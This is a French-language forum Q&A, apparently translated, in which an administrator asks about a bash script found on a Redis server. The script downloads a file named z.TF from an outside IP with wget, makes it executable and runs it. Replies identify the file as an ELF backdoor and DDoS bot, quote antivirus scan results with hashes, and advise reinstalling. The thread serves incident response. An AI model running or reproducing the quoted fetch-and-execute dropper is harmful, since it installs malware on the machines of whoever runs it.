linux - Que signifie ce code de hacker?

Question

Aujourd'hui, j'ai découvert que redis ne pouvait pas se connecter à un serveur. J'ai trouvé une telle instruction sur le serveur

.

#!/bin/bash
zfile="/tmp/z.TF"

if [ ! -f "$zfile" ]; then  
    wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi

Téléchargé et exécuté le fichier z.TF Lors de l'ouverture de z.TF, tout est du bytecode. Ce programme peut être automatiquement réexécuté.

Actuellement, ce processus de programme est interrompu, mais le service Redis n'est toujours pas disponible. Je ne sais pas s'il reste d'autres programmes malveillants.

Quelqu'un peut-il expliquer le contenu de z.TF ? Et comment y faire face.

Answer 1

z.TF est un fichier exécutable Linux au format ELF

Votre serveur a une porte dérobée installée. Réinstallez le système dès que possible pour corriger la vulnérabilité.
Mettez à niveau tout ce qui doit être mis à niveau.

---

C'est essentiellement une porte dérobée + un gril

VirSCAN.org Scanned Report :
Scanned time   : 2017-06-06 20:53:39
Scanner results: 10%的杀软(4/39)报告发现病毒
File Name      : z.TF
File Size      : 649640 byte
File Type      : application/x-executable
MD5            : a6f42e73365ad56ce42985c5518d7e34
SHA1           : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
Online report  : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
AVAST!         170303-1       4.7.4             2017-03-03     46   ELF:Ddostf-A                  
SOPHOS         5.32           3.65.2            2016-10-10     8    Linux/DDoS-BE                 
奇虎360         1.0.1          1.0.1             1.0.1          4    Win32/Backdoor.34d            
江民杀毒         16.0.100       1.0.0.0           2017-06-05     2    Backdoor.Linux.wfg            

Answer 2

Au fait, merci de m'envoyer le code de t.ZF

N'avez-vous pas expliqué clairement le code que vous avez posté ?